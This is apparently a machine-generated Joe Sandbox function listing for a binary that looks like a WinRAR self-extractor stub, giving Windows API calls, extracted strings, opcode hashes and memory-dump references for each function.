API String ID: 2092733347-0
Opcode ID: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
Instruction ID: 02774a9cb6e21941c398a3c18f68adb0beb9fe2a533dac6473ffeec70a5fe769
Opcode Fuzzy Hash: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
Instruction Fuzzy Hash: A2518CB2F106519BEB04DFA8D4401AC77B1F748B88BA0803ADE0DA7B58DF78E556C710

Function 00007FF731C8EF90 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF731C8EFF4

Part of subcall function 00007FF731C85164: GetVersionExW.KERNEL32 ref: 00007FF731C85195

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF731C8F016
FileTimeToSystemTime.KERNEL32 ref: 00007FF731C8F022
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF731C8F032
SystemTimeToFileTime.KERNEL32 ref: 00007FF731C8F040
SystemTimeToFileTime.KERNEL32 ref: 00007FF731C8F04E

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
Instruction ID: 4ebc6eb02df5c8897c1128e310dcca865b8c3abd46b424dd4af2c0eace3a16b3
Opcode Fuzzy Hash: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
Instruction Fuzzy Hash: BC315C62F10A51DEFB04DFB5D8801AC7370FB08758BA4502AEE0D93A58EF78D895C311

Function 00007FF731C878D8 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C87C4C

Strings

rar, xrefs: 00007FF731C87A5B, 00007FF731C87A6A, 00007FF731C87B27, 00007FF731C87B3C
.rar, xrefs: 00007FF731C87929, 00007FF731C87938
sfx, xrefs: 00007FF731C879B3, 00007FF731C879C2
exe, xrefs: 00007FF731C8796F, 00007FF731C8797E

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: .rar$exe$rar$sfx
API String ID: 3668304517-630704357
Opcode ID: 396299a5b1ccd598accc38a78ad002547d98c5a043810e6323e0cb500f167d8a
Instruction ID: 281ef63508eabe689d7889fd18bf45b98624c7e791d4b0fc9e549940e0e2907d
Opcode Fuzzy Hash: 396299a5b1ccd598accc38a78ad002547d98c5a043810e6323e0cb500f167d8a
Instruction Fuzzy Hash: 2EA1E222E14B5660EB00EF65D8852BCA361FF40B98FA05235CE1D17AE9EFBCE541D360

Function 00007FF731CA5C68 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF731CA5CD8

Part of subcall function 00007FF731CA5190: abort.LIBCMT ref: 00007FF731CA51A3

_CallSETranslator.LIBVCRUNTIME ref: 00007FF731CA5D23
abort.LIBCMT ref: 00007FF731CA5F51

Strings

RCC, xrefs: 00007FF731CA5CF4
MOC, xrefs: 00007FF731CA5CEC

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
Instruction ID: 913b837c41555c84e9c77a510feb50b474403d72e178ae11a5450e977f1375d2
Opcode Fuzzy Hash: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
Instruction Fuzzy Hash: 3491CFB3E08B819AE711EB64E8402ADBBB0F704798F648529EF8C07B55DF78D195D700

Function 00007FF731CA4F00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF731CA4F2B
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF731CA4FC0
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF731CA2EDE), ref: 00007FF731CA500F

Strings

csm, xrefs: 00007FF731CA4FA6
f, xrefs: 00007FF731CA4F3E

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
Instruction ID: 800c46d0bbb511636df36a0a6aba7ff9fc415f69defb9251d775c8f0b21b1785
Opcode Fuzzy Hash: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
Instruction Fuzzy Hash: C851F632F09202A6DB15EF11E444A69B7A5FB40B88FB0C834DE0E47749DFB9E841E760

Function 00007FF731C7CEF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF731C7D04D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7D0E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7D0E7

Part of subcall function 00007FF731C7DE14: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF731C7CF5B), ref: 00007FF731C7DE37
Part of subcall function 00007FF731C7DE14: GetLastError.KERNEL32 ref: 00007FF731C7DE98
Part of subcall function 00007FF731C7DE14: CloseHandle.KERNEL32 ref: 00007FF731C7DEAB

Strings

SeRestorePrivilege, xrefs: 00007FF731C7CF6E
SeSecurityPrivilege, xrefs: 00007FF731C7CF4F

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 2102711378-639343689
Opcode ID: 2422b4c07861c816dcb6e088245771ec7e30f8252f36e9de8bdb4ac705605003
Instruction ID: a982986e195720ef1ee85d91628eec06dd2136940f895c2a10e77eb9e2a5fa97
Opcode Fuzzy Hash: 2422b4c07861c816dcb6e088245771ec7e30f8252f36e9de8bdb4ac705605003
Instruction Fuzzy Hash: 6C51BF22F08742A9FB01FB65D8952BDA360AF847E4FA01134DE4D13696DEFCE485E320

Function 00007FF731C97AA8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF731C97AEF
GetWindowRect.USER32 ref: 00007FF731C97B40
ShowWindow.USER32 ref: 00007FF731C97C16
ShowWindow.USER32 ref: 00007FF731C97C43

Strings

RarHtmlClassName, xrefs: 00007FF731C97BCB

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Window$Show$Rect
String ID: RarHtmlClassName
API String ID: 2396740005-1658105358
Opcode ID: 2c88818459fa249436b09cd9d1218aa4cb25f816733d15aa3761c506717048c9
Instruction ID: d356174b5d36777c695efd7fcc7c038528226f8ee46d5ba16261f1535b19a485
Opcode Fuzzy Hash: 2c88818459fa249436b09cd9d1218aa4cb25f816733d15aa3761c506717048c9
Instruction Fuzzy Hash: A5519632E09B819AEB24AF25E44437AE7A0FF85B80FA44535DE4E43B55DFBCE0459B10

Function 00007FF731C9FC8C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FF731C9FCC3
SetEnvironmentVariableW.KERNEL32 ref: 00007FF731C9FD3C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9FD9B

Strings

sfxpar, xrefs: 00007FF731C9FD35
sfxcmd, xrefs: 00007FF731C9FCBC

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
String ID: sfxcmd$sfxpar
API String ID: 3540648995-3493335439
Opcode ID: de9741161c31a08bbe9fff160a80b1df0e4e4f2ed9c3bb4d40033563ae2b19ea
Instruction ID: 79dcffe23722b9ae40cd484004085d6d46455fb609d0ee4597c87393aa677953
Opcode Fuzzy Hash: de9741161c31a08bbe9fff160a80b1df0e4e4f2ed9c3bb4d40033563ae2b19ea
Instruction Fuzzy Hash: FF31D032F14A06A4FB04EF69E8841ACB371FB48B98FA01131DE5D17BA8DEB8D041D360

Function 00007FF731C9FE54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00007FF731C9FEE0
REPLACEFILEDLG, xrefs: 00007FF731C9FEB4, 00007FF731C9FF19

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
Instruction ID: fca642b95eb0e8867bd0053d135e591c69716fba8a5ff463ff6fcd5b0f7a44e2
Opcode Fuzzy Hash: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
Instruction Fuzzy Hash: 30211B62D0DB87A1FB10AB15E844178B7A0EB45B88FF44436D98D43360EEFCE595E360

Function 00007FF731CABF30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF731CABF50
GetProcAddress.KERNEL32 ref: 00007FF731CABF66
FreeLibrary.KERNEL32 ref: 00007FF731CABF8B

Strings

CorExitProcess, xrefs: 00007FF731CABF5F
mscoree.dll, xrefs: 00007FF731CABF47

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
Instruction ID: 2269a4cc8c9ed2ebf6576900264b697d1c3b2887a6962c4a8a7d26c6d1716a6a
Opcode Fuzzy Hash: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
Instruction Fuzzy Hash: B4F0C865E29642A1EF45EB50F84437DA360FF8C790FA85035E94F82254CEBCD444E720

Function 00007FF731CB4540 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CB4585

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
Instruction ID: 94a68a259c1527def383fc8412514c449eb7fb31185f72ecda34c334d06de72e
Opcode Fuzzy Hash: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
Instruction Fuzzy Hash: 0981E122E1CA52A5F710FB6598406FCA7A4BB44B88FA08135DD0F93B95CFBCE445E720

Function 00007FF731C83AB8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF731C83B7B
CreateFileW.KERNEL32 ref: 00007FF731C83BE4
SetFileTime.KERNEL32 ref: 00007FF731C83CAC
CloseHandle.KERNEL32 ref: 00007FF731C83CB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C83CEC

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2398171386-0
Opcode ID: f8faf67a92c5f45ac7faebd5bd23c7b77134a006d9c4cb7cca87247eeb2fbdf0
Instruction ID: 5f949619714d8ac02577753081c7b88a87a3b9a47b20e3cd5098b7e181ff1136
Opcode Fuzzy Hash: f8faf67a92c5f45ac7faebd5bd23c7b77134a006d9c4cb7cca87247eeb2fbdf0
Instruction Fuzzy Hash: 0351E262F08A4269FB50EF75E8803BDA3B1BB487A8FA06635DE1D46ED4DE78D015D310

Function 00007FF731CB3EB4 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF731CB46E7), ref: 00007FF731CB3F11
WideCharToMultiByte.KERNEL32 ref: 00007FF731CB3FED
WriteFile.KERNEL32 ref: 00007FF731CB4013
WriteFile.KERNEL32 ref: 00007FF731CB4052
GetLastError.KERNEL32 ref: 00007FF731CB408A

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
Instruction ID: dcbe15480e6c5ea85cd49ad249d49ac17a7238b002951bca07d81ee077f9678e
Opcode Fuzzy Hash: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
Instruction Fuzzy Hash: 1051D032E18A5199E710DF75E4403ACBBB0FB44B98FA48135DE4E87A98DFB8D146D720

Function 00007FF731CA1D80 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF731C84DB4), ref: 00007FF731CA1E07
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF731C84DB4), ref: 00007FF731CA1E89
SysAllocString.OLEAUT32 ref: 00007FF731CA1E96

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 7711750e0accb9ad616eeee36fa2b6d61d265f9f390964b4f40596f0c6636217
Instruction ID: 06c7c965e735c4c47abca31154221ae022e978446f42a631007232cfe15e7a01
Opcode Fuzzy Hash: 7711750e0accb9ad616eeee36fa2b6d61d265f9f390964b4f40596f0c6636217
Instruction Fuzzy Hash: 9B41D521E08646A9EB16FF6194043B9A394FF04BE4FA44A34EA2D877D5DFBCE1419360

Function 00007FF731CAF394 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF731CAF4B6

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
Instruction ID: 0a762c83325430efd94539bd882690b0219ed73768f73133514434995a90534b
Opcode Fuzzy Hash: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
Instruction Fuzzy Hash: FE410921F09A42A1FB17BB56A800679E395BF04BE0FB94935DD1D8B744EEBCE440E320

Function 00007FF731CB5658 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF731CB567F
_set_statfp.LIBCMT ref: 00007FF731CB569A
_set_statfp.LIBCMT ref: 00007FF731CB56B6
_set_statfp.LIBCMT ref: 00007FF731CB56F2

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction ID: c8e81c8dd80f171886bde3975f650ced771811a4e616e12fe4c864224bb666ed
Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction Fuzzy Hash: 29116036E1864325F755B524F4823799341AF543B0FF5C634E66E877D78EACA440A121

Function 00007FF731C9FDA4 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF731C9FDC1
GetMessageW.USER32 ref: 00007FF731C9FDD8
TranslateMessage.USER32 ref: 00007FF731C9FDE3
DispatchMessageW.USER32 ref: 00007FF731C9FDEE
WaitForSingleObject.KERNEL32 ref: 00007FF731C9FDFC

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

